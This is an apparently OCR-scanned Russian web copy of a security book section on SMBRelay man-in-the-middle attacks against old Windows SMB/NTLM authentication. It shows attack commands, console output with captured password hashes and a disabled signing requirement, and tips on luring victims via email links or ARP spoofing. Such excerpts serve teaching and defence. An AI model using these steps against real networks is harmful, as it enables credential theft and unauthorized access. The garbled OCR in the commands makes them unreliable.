На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Меры противодействия перенаправлению SMB-данных

 


Бюллетень Нет

 

BID Нет

Исправлено в SP Нет

 

Фиксируется Нет

 

Теоретически, сложно защититься от использования сервера SMBRelay. Поскольку сервер способен устанавливать соединение для всех разновидностей протоколов LM/NTLM, он в состоянии захватывать любые данные аутентификации, которые были ему направлены.
Для противодействия атакам посредника SMBRelay (см. описание ниже) можно органи­зовать обмен информацией по SMB с использованием цифровой подписи, но это не защитит от атак с использованием подложного сервера, поскольку программа SMBRelay (при возмож­ности) способна снижать уровень безопасности защищенного канала связи.
Атаки посредника


Популярность

2

 

Простота

2

 

Опасность

8

 

Степень риска

3

 

 

 

 

Атаки посредника (М1ТМ— Man-In-The-Middle) были указаны как главное предназначение программы SMBRelay. Хотя идея атак посредника на службы SMB ко времени выпуска этой про­граммы уже старела, именно программа SMBRelay стала первым широко распространенным сред­ством для их автоматизации.
Рассмотрим пример выполнения атаки посредника с помощью программы SMBRelay (7). В данном примере злоумышленник создает подложный сервер с адресом 192.168.234.251, используя параметр /L+. С помощью параметра /R, устанавливается ад­рес ретрансляции 192.168.234.2 52, а параметр/Т служит для задания адреса сервера
192.168.234.34.
Тистйнг 5Х Атака'посредника'
C:\sanibrelay /IL 2 /IR 2 /К 192.168.234.252  /Т 192 .16В. 234.220
Bound to port 139 on address 192.163.234.251
Атакуемый клиент с адресом 192.168.234.220 затем подключается к подложному сер­веру, при этом создается иллюзия, что он соединяется с нужным ему сервером.
Connection from 192.168.234.220:1043 Request type:   Session Request    72 bytes Source name:  GW2KNT4 <00> Target name:   *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER'... Response-. Positive Session Response   4 bytes
THIS MAY NOT WORK!
Request type:  Session Message    174 bytes SMB_COM_NEGOTIATE
Response: Session Message   95 bytes
Challenge   (8 bytes): 1DEDB6BF7973DD06 Security signatures required by server *' Disabling security signatures
Обратите внимание, что запрашиваемый клиентом сервер был сконфигурирован таким образом, чтобы требовалась установка SMB-сосдинения с цифровой подписью, а сервер SMBRelay пытается отключить эти подписи.
286 bytes
Request type: Session Message SMB_COM_ SE S S ION_S ETUP_ANDX Password lengths:   24 24
Case insensitive password:    A4DA35F982C8E17FA2BBB952CBC01382C210FF29461A71F1 Case sensitive password: F0C2D1CA8895BD26C7C7E8CAA54E10F1E1203DAD4782FB9S Username: "Administrator'' Domain: "NT4D0M"
OS: "Windows NT 1381"
Lanman type:
???: "Windows NT 4.0"
Response: Session Message   144 bytes
OS: "Windows NT 4.0"
Lanman type: "NT LAN Manager 4.0"
Domain: "NT4DOM,,
Password hash written to disk Connected? Relay IP address added to interface 2
Bound to port 139 on address 192.168.234.252 relaying for host GW2KNT4 192.168.234.220
В данной точке злоумышленник успешно "вклинился" в поток данных SMB, передавае­мых между атакованным клиентом и запрашиваемым им сервером, и получил из данных об­мена "запрос—ответ" клиентские хешированные пароли LM и NTLM. Подключение к адресу ретрансляции предоставляет клиенту доступ к ресурсам запрашиваемого сервера. Например, в следующем листинге отдельная атакуемая система монтирует совместно используемый ре­сурс С$ по адресу ретрансляции.
D:\>net иве * \\192.168.234.252\с$
Drive G: is now connected to \\celery\eS-
The command completed successfully.
Ниже показан отчет о соединении на консоли сервера SMBRelay в системе хакера (192.168.234.50).
*** Relay connection for target GW2KNT4 received from 192.168.234.50:1044 *** Sent positive session response for relay target GW2KNT4 *** Sent dialect selection response (7)  for target GW2KNT4 *** Sent SMB Session setup response for relay to GW2KNT4
Программа SMBRelay может давать неожиданные результаты, которые не всегда будут верными, но при успешной реализации позволяет провести разрушительную атаку: посред­ник получает полный доступ к ресурсам запрошенного сервера, даже не пошевелив пальцем.
Конечно же, основное препятствие здесь — заставить клиента сначала подключиться к подложному серверу, но несколько способов для этого мы уже описали. Один из них — по­слать по электронной почте сообшение с гиперссылкой на адрес сервера SMBRelay. Другой способ — реализовать атаку протокола ARP в целом сегменте сети, заставив тем самым все системы этого сегмента проводить аутентификацию через подложный сервер. Перенаправле­ние протокола ARP и подмена данных кэш-памяти описаны в главе 10 книги Секреты хаке­ров. Безопасность сетей - готовые решения, четвертое издание. Стюарт Мак-Клар, Джоел Скембрей, Джордж Кури.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика